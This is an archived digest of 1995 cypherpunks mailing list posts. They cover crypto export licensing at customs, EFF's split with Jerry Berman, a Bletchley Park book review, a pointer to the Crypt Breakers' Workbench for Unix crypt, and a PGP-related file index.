From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sun, 1 Jan 95 09:21:32 PST
To: rishab@dxm.ernet.in
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <gate.ZHT0Xc1w165w@dxm.ernet.in>
Message-ID: <9501011723.AA12712@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>Just which form did they sign, exactly? These procedures remind me of Feynman's
>refusal to sign more than 12 times during some government talk.

The license itself has a space for the customs people to "endorse"
each export/re-import.  Interestingly, I can't figure out how to
distinguish between the signature I got when I left and the one I
got when I came back.  There are just two signatures and stamps
on the back of the license, one dated when I left and one dated when
I returned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 1 Jan 95 13:21:15 PST
To: cypherpunks@toad.com
Subject: good news about the EFF...
Message-ID: <199501012115.NAA06292@art.net>
MIME-Version: 1.0
Content-Type: text/plain


This might be of interest:


 ---------- Forwarded message ----------
 Date: Tue, 20 Dec 1994 17:04:23 -0800
 From: Brock N. Meeks <brock@well.sf.ca.us>
 To: cwd-l@cyberwerks.com
 Subject: CWD Changes in the Wind At EFF


 CyberWire Dispatch // Copyright (c) 1994 //

 Jacking in from the "Back to the Future" Port:

 Washington, DC -- The Electronic Frontier Foundation has fired its Policy
 Director Jerry Berman and will soon release a sweeping new agenda for 1995
 that promises to return the organization to its original grassroots
 beginning.

 Asked to comment on his firing, Berman bristles and says:  "I think that's
 baloney." Then he quickly adds:  "Did you ever think I might have wanted to
 leave?"

 Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
 group called the Center for Democracy and Technology.  His departure from
 EFF and the creation of CDT will be made public this week in a joint
 announcement with EFF, sources said.  The official line that will be spun
 to the public is that the two came to a "mutual parting of the ways."

 That benign statement, however, doesn't reflect the long hours of the
 behind the scenes deliberations, in which the language of the press
 releases will be as cautiously worded as an official State Department
 briefing.

 Heroes and pioneers always take the arrows;  EFF lately has looked more
 like a pin-cushion than its self-appointed role as protector of all things
 Cyberspace.  The beleaguered organization has over the course of the past
 two years endured often withering criticism from the very frontier citizens
 it was sworn to uphold and protect.

 The reason:  A perceived move away from its grassroots activism to the role
 of a consummate Washington Insider deal maker.

 Berman is the man largely responsible for cutting EFF's policy cloth.  He
 wears the suit well.  Maybe too well.  Although he has the political acumen
 to arm-wrestle inside-the-beltway, it comes at the expense of his
 management style, EFF insiders said.  Those shortcomings came at the
 expense of EFF's day-to-day operations and didn't go unnoticed by its board
 of directors.

 The EFF board in October fired Berman for mismanaging the group's
 organizational and fiscal responsibilities.  No impropriety or malfeasance
 was alleged, the board was simply dissatisfied with Berman's day-to-day
 managing of the shop.

 In a precursor to the board's October decision, it split Berman's job,
 giving him charge of just the policy arm, which board members said played
 to his strength.  They then hired Andrew Taubman as executive director to
 oversee the day to day tasks.

 Separate from the organizational and fiscal misgivings, the board also
 couldn't brook with priority on policy affairs that Berman had engineered.
 Although Berman expertly navigated EFF through the choppy political waters
 of Washington, that course increasingly steered the organization away from
 its original vision as a populist group.

 Never was the hardcore policy-driven slant of EFF more apparent than during
 the two-plus year political firestorm that surrounded the FBI's infamous
 Digital Wiretap.

 The political wrangling during that time, in which Berman brokered the
 influence of EFF with the backing of the telephone, computer and software
 industries, to reach a compromise with legislators and the FBI on the
 bill's language, increasingly drove a wedge between the organization and
 its grassroots membership.

 Nobody within EFF interviewed for this article disagreed with how Berman
 ran his policy tour de force.  In fact, the board was generally in
 agreement that Berman did an excellent job in helping to broker a less
 nefarious version of the FBI's wiretap bill than would have otherwise
 passed without his involvement on EFF's behalf.

 As effective as Berman was in shuffling between the political and
 ideological interests of EFF and its members, the "inside baseball"
 political bullshit was largely lost on the community of the Net, who viewed
 it as a kind of betrayal.

 The fact that there would be a backlash from the Net came as no surprise to
 Berman and EFF, who recognized the fine line they had to walk in dealing
 with a politically charged issue rivaled only by the Administration's
 insipid Clipper Chip encryption policy.

 You see, the Net community is a binary braintrust, a world of ones and
 zeros -- either on or off -- in which shades of grey are rarely an option.
 Yet it is exactly these shades of grey in which Berman excels and thrives.
 It is a skill --  and damn near an art form -- to be able to move among the
 shadows and Washington's land of a thousand different agendas.  And that's
 right where Berman had steered EFF.

 However, it's not where the EFF board thought the organization belonged.

 And so, in a few days the Net community will read a grand announcement in
 which EFF and Jerry Berman state they've had a "mutual parting of the
 ways."    The announcement will be several fold, including:

 -- The formation of  Berman's new Center for Democracy and Technology.

 -- That EFF has hired current board member David Johnson, currently a
    computer law attorney with the Washington law firm of Wilmer, Cutler and
    Pickering, to be its new policy director, although that exact title has
    yet to be finalized.

 -- A new policy agenda for EFF that includes creation of an annual "State
    of the Net" report.

 EFF Executive Director Taubman declined to comment on Berman's firing,
 saying only that the organization and its former director had, indeed,
 agreed to a "mutual parting of the ways."    He said EFF and Berman's new
 group would continue to work closely with each other and that the efforts
 of each would be mutually beneficial.

 Johnson said he was excited about the new policy efforts he would be
 heading up for EFF, which, in addition to the "State of the Net" report,
 includes commissioning papers and studies to help build a more solid idea
 of what exactly constitutes the Net "community" on a global basis and
 helping to define the Net's community as a recognizable legal entity.

 In addition to the new policy efforts, Johnson will have to restock EFF's
 policy department:  All the EFF policy wonks have jumped ship, resigning
 their positions and joining with Berman's new venture.

 The upheaval at EFF -- which included moving the entire operation here to
 new digs in Washington -- apparently hasn't hurt morale which has "never
 been higher," Taubman said.

 Underscoring Taubman's remarks is EFF's on-line legal counsel Mike Godwin,
 who said the changes "create an opportunity for us to return to our more
 populist mission and vision that we started with."


 All Things Being Equal
 =================

 Adversity for a political junkie is the warp and woof  of  Washington
 culture.  Berman is no worse for the wear, having parachuted out of EFF and
 into his new organization. He said CDT will differ from EFF "on what to
 emphasize."  That emphasis will be to focus on "on the ground public
 policy," he said.

 And it won't only be Berman's staff that sets the scene for familiarity as
 he jump starts CDT.  The former EFF policy staffers will supply him with
 horsepower and his political currency will open doors.  But he needs cold
 hard cash to feed the troops and pay the rent.

 That means his new organization must have financial backing and here, too,
 there are no strangers.  Berman's bringing along a fair chunk of EFF's
 corporate sponsors to his new home.

 Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic,
 Nynex, Apple Computer and Microsoft.  These same companies provided a
 combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't
 listed as a major donor (over $5,000) on EFF's tax returns.

 It's not known if these companies will continue to fund EFF in full or in
 part or what amount they have pledged to Berman's group.  Just how
 well-heeled CDT is and exactly who makes up the full roster of its
 sponsorship remains to be seen.  We'll know that after the organization
 files its first tax returns, which will be a matter of public record.


 Meeks out...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Sun, 1 Jan 95 13:45:35 PST
To: cypherpunks@toad.com
Subject: Berman resignation
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID: <199501012145.NAA10782@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Brock's piece on Jerry Berman's resignation broke about a week after I
sent my EFF t-shirt back, attn Jerry Berman.

Never again believe that cypherpunk political action doesn't make a
difference.

Raph

(BTW, I got a nice apology from Peter Lewis about the NYT article.
Apparently, it got shredded in the editing process)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 1 Jan 95 12:38:42 PST
To: cypherpunks@toad.com
Subject: Stegno for Kids
Message-ID: <199501012039.AA14592@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



I was at a birthday party for a nine-year-old niece. She got some dolls
(ugh), a Sega Game Gear Game called "Out Run" (not bad) and Crayola brand
secret writing pens (WOW!!!!). There are about 8 pens in the set. You write
secretly with two of them and develop the image with the other six. I believe
the 6 developing pens create images in different colors, but I'm not sure.
It just wouldn't look cool for me to rip open the package at SideShow Pizza
and hog her gift. Then I had to go. Alas... 

-Peter 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 1 Jan 95 04:00:48 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <gate.ZHT0Xc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@research.att.com>:
> So we chatted about computers and cryptography for a while.  Finally,
> the two of them decided that it wouldn't really hurt for them to just
> sign the form as long as I promise to call my lawyer and get the SED

Just which form did they sign, exactly? These procedures remind me of Feynman's
refusal to sign more than 12 times during some government talk.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Terka <werewolf@io.org>
Date: Sun, 1 Jan 95 14:54:07 PST
To: cypherpunks@toad.com
Subject: The Code Breaker's Work Bench?
Message-ID: <Pine.BSI.3.91.950101175233.8993A-100000@nudge.io.org>
MIME-Version: 1.0
Content-Type: text/plain


I saw someone mention this program on sci.crypt once. It's supposed to be
an aid to those trying to break a cypher. 

Does anybody know the ftp site it is located on? unimi.it perhaps?

--------------------------------------------------------------------------
Mark Terka     | werewolf@io.org             | public key (werewolf) by
Toronto,Canada | dg507@cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 5 Jan 95 01:07:06 PST
To: cypherpunks@toad.com
Subject: Re: another factoring thing. . . .
Message-ID: <ab2d005d03021004c39a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 PM 12/30/94, camp@industrial.com wrote:
>Hey did anyone see the article, some time ago in Science News (May 14,
>1994) there was this article on using a 'quantum computer'.  Through
>the marvels of quantum mechanics it is theoretically possible to
>build a computer that would be really good at factoring large numbers
>such as the ones used in RSA.  This combined with team sieving could
>possibly be used to significantly reduce the time required to factor
>a key.  Any thoughts, did anyone else see the article, has there already
>been a really stimulating discussion that I missed?  Well let me know.
....
I think that that kind of quantum computer is much less likely to be built
to impact RSA style crypto, than some revolutionary sort of factoring
algorithm. It is not clear whether the tolerances required for the quantum
computer can ever be met and it is not entirely clear if the quantum
principles are correct. I don't entirely rule it out however.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Sun, 1 Jan 95 18:55:23 PST
To: cypherpunks@toad.com, gnu
Subject: Book review: Codebreakers, the Inside Story of Bletchley Park
Message-ID: <9501020255.AA13843@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is NOT David Kahn's excellent book "The Codebreakers".  This is a
British volume full of personal stories of thirty people who worked at
Bletchley Park or at British code-breaking in the field during WW2.
I found it a very touching and personal book.  Each person tells their
own story in a five- or six-page essay, and the stories cover a whole
range of activities, from cryptanalytical work to typing-and-filing
to the people who constructed and maintained the physical buildings.

As the introduction says, "...few of the events described here were
chronicled at the time, and those who worked at Bletchley and its
outstations were forbidden to talk or write about it -- almost to
remember it.  The compiling of this book has rested almost entirely on
personal memories; and that is unusual in an account which pretends to
any sort of accuracy.  Moreover, nobody who worked at Bletchley can
now be under 65; several contributors are in their mid-80s.  For all
of us clear and accurate recollection of highly specialized Top Secret
facts across fifty years has been a demanding task, requiring much
cross-checking."

There are lots of details about how real live wartime code-breaking
worked fifty years ago -- details I have seen nowhere else.  I
recommend this book to any cypherpunk.

Codebreakers: the inside story of Bletchley Park.  ed. by Francis
Harry Hinsley and Alan Stripp.  Oxford, England: Oxford University
Press, 1994 (hardback issued in 1993).  ISBN 0-19-285304-X.  US$13.95,
at my local bookstore.

--
John Gilmore                gnu@toad.com  --  gnu@cygnus.com  --  gnu@eff.org
 A well-regulated intelligentsia, being necessary to the security of a free
 State, the right of the people to keep and bear books, shall not be infringed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 1 Jan 95 17:49:30 PST
To: werewolf@io.org (Mark Terka)
Subject: Re: The Code Breaker's Work Bench?
In-Reply-To: <Pine.BSI.3.91.950101175233.8993A-100000@nudge.io.org>
Message-ID: <199501020148.UAA23008@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I saw someone mention this program on sci.crypt once. It's supposed to be
| an aid to those trying to break a cypher. 

From cbw.doc:

Overview
     The Crypt Breakers' Workbench (CBW) is an interactive
multi-window system for mounting a cipher-text only attack on a file
encrypted by the Unix crypt command.  CBW is a workbench in the sense
that it provides the user with an integrated set of tools that
simplify the initial, middle and final portions of the decryption
process.  A user interacts with the workbench by choosing tools and
setting parameters.  CBW carries out the work and displays the
results.  A moderately experienced user of CBW can easily decrypt both
long and short messages when bigram statistics are known for the
message space.  The basic cryptanalytic techniques used by CBW are
described in a paper by Reeds and Weinberger that appeared in the
October 1984 issue of the ATT Bell Laboratories Technical Journal.
This manual explains the capabilities and operating procedures of CBW

coast.cs.purdue.edu:/pub/tools/unix/cbw.tar.Z





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 1 Jan 95 18:59:46 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Ch-ch-ch-ch-changes...
Message-ID: <Pine.ULT.3.91.950101204945.29467B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I read with interest about the (about time) reorganization of the EFF.  
While it is certainly a little early to make any kind of final decisions 
about the EFF, I do wonder a few things:

What will the EFF now be doing now that isn't already done by other
organizations? 

It sure seems to me that this CDT is awfully similar to the CPSR, except
it's headed by former EFF people who have been puckering up to the
Washington politicos, the Telcos and other entities for the past few 
years.  Is there really a purpose?

Any thoughts on how the EFF will change its approach?  I'm due for
renewal in March and I want to make sure I'm not flushing my money away. 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----


____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=> All I want is a cure...  
   \/   Finger for PGP Public Key  <=>      And all my friends back!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sun, 1 Jan 95 18:55:05 PST
To: cypherpunks@toad.com
Subject: Re: The Code Breaker's Work Bench?
In-Reply-To: <199501020148.UAA23008@bwh.harvard.edu>
Message-ID: <dCs1lOwscMS7075yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501020148.UAA23008@bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>
>| I saw someone mention this program on sci.crypt once. It's supposed to be
>| an aid to those trying to break a cypher. 
>
>>From cbw.doc:
>
>Overview
>     The Crypt Breakers' Workbench (CBW) is an interactive
>multi-window system for mounting a cipher-text only attack on a file
>encrypted by the Unix crypt command.  CBW is a workbench in the sense

Ok....I thought it was more generic than that.

To mount an attack on an opponent requires specific programs oriented
toward the cypher in question. Can anyone suggest what programs / tools
may be out there for cypher busting?

I'm just curious....and no, I'm not planning on reading my girlfriend's
mail :>. I'm just interested in the methods that exist in the real world. Hell, I'd
even be interested in a program to bust Enigma. That would give a basic example
or idea of how codebreakers operate on a day to day basis.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 1 Jan 95 22:49:38 PST
To: cypherpunks@toad.com
Subject: I'm back. :)
Message-ID: <199501020643.WAA08339@art.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi folks,

I finally got back on cypherpunks. Have been incredibly busy
but wanted to keep in touch as several artist friends of mine
want to start using art as an encryption vehicle... Should be
fun...

Happy New Years. Let's hope it's a good one for cryptography. 

-lile


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 1 Jan 95 20:21:50 PST
To: gnu@toad.com
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <9501020255.AA13843@toad.com>
Message-ID: <199501020423.XAA26847@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me wholeheartedly echo John's recommendation; this is a terrific
book, one from which I learned a great deal.  You'll get more out
of it, however, the more you already know about the Bletchley Park
efforts and the principles on which the Enigma and Lorenz machines
operated.  In particular, Welchman's "The Hut Six Story" (McGraw
Hill, 1982) makes good preparatory reading.  Unfortunately, that
book has been out of print for some time, but is fairly widely
available at used book shops.

I had the opportunity to visit Bletchley Park a couple of weeks
ago.  Most of the original huts are still standing, albeit in
various states of disrepair.  Walking around the site, knowing
something of what went on there in complete secrecy 50 years ago,
I could only imagine the sense of urgency and bustle that must have
been in the air with 12000 people working (day and night, over
three shifts) in a relatively small space.  The more I learn about
the effort the more impressed I am with the accomplishments that
took place there.  In particular, the path from basic research to
operational functionality was far shorter than one would think
possible.

After the war, the site was used by GCHQ and by British Telecom as
a training center.  It was recently saved from redevelopment and is
now being converted into a museum.  Among the projects taking place
there is a construction of a working model of the original "Colossus"
machine, arguably the first electronic computer ever built (it was
used in breaking the Lorenz teleprinter cipher).  I believe the site
is currently open for visitors on alternate weekends.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Freed <s009amf@discover.wright.edu>
Date: Sun, 1 Jan 95 23:04:48 PST
To: Lile Elam <lile@art.net>
Subject: Re: good news about the EFF...
In-Reply-To: <199501012115.NAA06292@art.net>
Message-ID: <Pine.SUN.3.91.950101232113.15557A-100000@discover>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Jan 1995, Lile Elam wrote:

>  CyberWire Dispatch // Copyright (c) 1994 //
> 
>  Jacking in from the "Back to the Future" Port:
> 
>  Washington, DC -- The Electronic Frontier Foundation has fired its Policy
>  Director Jerry Berman and will soon release a sweeping new agenda for 1995
>  that promises to return the organization to its original grassroots
>  beginning.
> 
>  Asked to comment on his firing, Berman bristles and says:  "I think that's
>  baloney." Then he quickly adds:  "Did you ever think I might have wanted to
>  leave?"
> 
>  Berman has, in fact, left EFF, to head a new, as yet unannounced, policy
>  group called the Center for Democracy and Technology.  His departure from
>  EFF and the creation of CDT will be made public this week in a joint
>  announcement with EFF, sources said.  The official line that will be spun
>  to the public is that the two came to a "mutual parting of the ways."
> 
>  That benign statement, however, doesn't reflect the long hours of the
>  behind the scenes deliberations, in which the language of the press
>  releases will be as cautiously worded as an official State Department
>  briefing.
> 
>  Heroes and pioneers always take the arrows;  EFF lately has looked more
>  like a pin-cushion than its self-appointed role as protector of all things
>  Cyberspace.  The beleaguered organization has over the course of the past
>  two years endured often withering criticism from the very frontier citizens
>  it was sworn to uphold and protect.
> 
>  The reason:  A perceived move away from its grassroots activism to the role
>  of a consummate Washington Insider deal maker.

Has anyone seen Monty Python's Life of Brian.....  Do I hear a parallelism???
Something to the effect of "The People's Judean Front", "The Popular 
People's Front", and it goes on and on....

How about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I 
hear more.. Or are we so split up that we can't agree on our common goal....

Aaron




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 2 Jan 95 00:55:30 PST
To: marc@cam.ov.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501020848.AAA08819@art.net>
MIME-Version: 1.0
Content-Type: text/plain


But what if that plane crashed...

It's better to spread people out over several flights...

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Sun, 1 Jan 95 23:25:31 PST
To: cypherpunks@toad.com
Subject: Listing of Files on the Auto-Responder as of 01-01-95
Message-ID: <RWw1lKjqRSwN075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Last Modified: 01-01-95 20:30 (CST)

This is the index for Sam Kaplin's Auto-Responder. To get a file:

Send a message to: skaplin@c2.org

The subject of the message MUST BE: SEND FILE [file_name]

EXAMPLE:
        Subject: SEND FILE help     <----Case Sensitive!!!

All binary files are UUENCODED with PGP signatures. Please address all
comments or problems to skaplin@skypoint.com. If you receive a blank
message back, then the file you requested does not exist. Should you have
a crypto related file that you would like added, contact me at:
skaplin@skypoint.com. Please note that I am subject to the petty whims of
the U.S. government, so I will not add any files which may be subject to
ITAR.

- --------------------------------------------------------------------------
File Name                       Description
- --------------------------------------------------------------------------
apgp212_1.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 1 of 4

apgp212_2.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 2 of 4

apgp212_3.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 3 of 4

apgp212_4.uue           Autopgp 2.12 offline mail packet processor.
                        Automates PGP functions. Part 4 of 4

apgp22b2_1.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 1 of 4 BETA

apgp22b2_2.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 2 of 4 BETA

apgp22b2_3.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 3 of 4 BETA

apgp22b2_4.uue          Autopgp 2.2b2 offline mail packet processor.
                        Automates PGP functions. Part 4 of 4 BETA

cp-faq1.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 1 of 11

cp-faq2.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 2 of 11

cp-faq3.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 3 of 11

cp-faq4.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 4 of 11

cp-faq5.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 5 of 11

cp-faq6.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 6 of 11

cp-faq7.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 7 of 11

cp-faq8.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 8 of 11

cp-faq9.uue             Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 9 of 11

cp-faq10.uue            Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 10 of 11

cp-faq11.uue            Tim May's Cypherpunk Faq - Everything you wanted to
                        know about C'Punk issues, but were afraid to ask.
                        Part 11 of 11

crypto1.uue             The Faq from talk.politics.crypto. A general overview
                        of cryptography. Part 1 of 2

crypto2.uue             The Faq from talk.politics.crypto. A general overview
                        of cryptography. Part 2 of 2

help                    This file.

key                     Sam Kaplin's PGP Public keys.

news_gateways           A listing of Mail -News gateways

pgpfaq1.uue             Frequently asked questions about PGP.
                        Part 1 of 2

pgpfaq2.uue             Frequently asked questions about PGP.
                        Part 2 of 2

rsa1.uue                A Faq put out by RSA outlining cryptography as it
                        applies to RSA. Part 1 of 2

rsa2.uue                A Faq put out by RSA outlining cryptography as it
                        applies to RSA. Part 2 of 2

remailer_list           A current listing of remailer sites.

wherefaq.long           Where to obtain PGP. (Long Version)

wherefaq.short          Where to obtain PGP. (Short Version)

yn075_1.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 1 of 14

yn075_2.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 2 of 14

yn075_3.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 3 of 14

yn075_4.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 4 of 14

yn075_5.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 5 of 14

yn075_6.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 6 of 14

yn075_7.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 7 of 14

yn075_8.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 8 of 14

yn075_9.uue             YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 9 of 14

yn075_10.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 10 of 14

yn075_11.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 11 of 14

yn075_12.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 12 of 14

yn075_13.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 13 of 14

yn075_14.uue            YARN .075 offline mail reader. Minimally supports
                        PGP internally. Part 14 of 14

==============================================================================

Interpretation is the revenge of the intellect upon art.
                         - Susan Sontag

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@icicle.winternet.com>
Date: Sun, 1 Jan 95 23:44:20 PST
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID: <Pine.SUN.3.91.950102013630.23484A-100000@icicle.winternet.com>
MIME-Version: 1.0
Content-Type: text/plain


I couldn't agree with the general drift much more.

The real objective is to get the customs officials used
to the procedure of dealing with the cryptographic materials.

Your best asset is a good feature reporter and a photographer.

Right now, I don't think U.S. Customs is going to ask you if you
have PGP in your PC if you leave the country, or return either.

They should, and I'd be proud to say yes.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                               REGISTERED PGP KEY NO.0C91594D     
carolann@icicle.winternet.com       finger carolann@winternet.com |more
***********************************************************************
My WWW Homepage Page is at:    http://www.winternet.com/~carolann


On Mon, 2 Jan 1995, Marc Horowitz wrote:

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules. 
> 
> I can think of at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material.  Should drive the Customs guys
> completely nuts.
> 
> 		Marc
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 3 Jan 95 19:28:47 PST
To: cypherpunks@toad.com
Subject: NYT article and LaMacchia case
Message-ID: <gate.gsgayc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Anon wrote:
> I want to publicly thank John Young for making articles available.  Most of 
> those articles I would not otherwise have seen.  

I second that!

> that John offered.  Was there anyone in the world, well, in the cyberworld, who 
> was fooled by the article on the Microsoft acquisition of the Catholic church?  
> Anyone, who after reading that piece, considered anything other than the 
> creativity of the author, should be committed to St. John's Home for the 
> Desperately Dumb.  

Notice that Microsoft was flooded with complaints only after Rush Limbaugh
read it on his show...

> However, there was something in that article that was of concern.  If the 
> Massachusetts judge in the MIT student case actually said that he couldn't act 
> because Congress had not enacted any laws, then it is for sure they will try to 
> and they will try to act hurriedly.  Hurried actions by congress are even worse 

The Reuters report said:
   Although U.S. District Court Judge Richard Stearns was critical of
   LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud
   statute because it could result in a flood of actions against home computer
   users copying even single software programmes for their own use.

Anonymity had nothing to do with it. It was clear cut copyright law - which
wouldn't have hurt LaMacchia as he wasn't making anything out of it, so they
tried to hit him with wire fraud, and the Judge found _that_ untenable.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Sun, 1 Jan 95 23:21:37 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> My conclusion from all this is that it just isn't possible for an
>> individual traveler to follow the rules. 

I can think of at least half a dozen cypherpunks who will be going
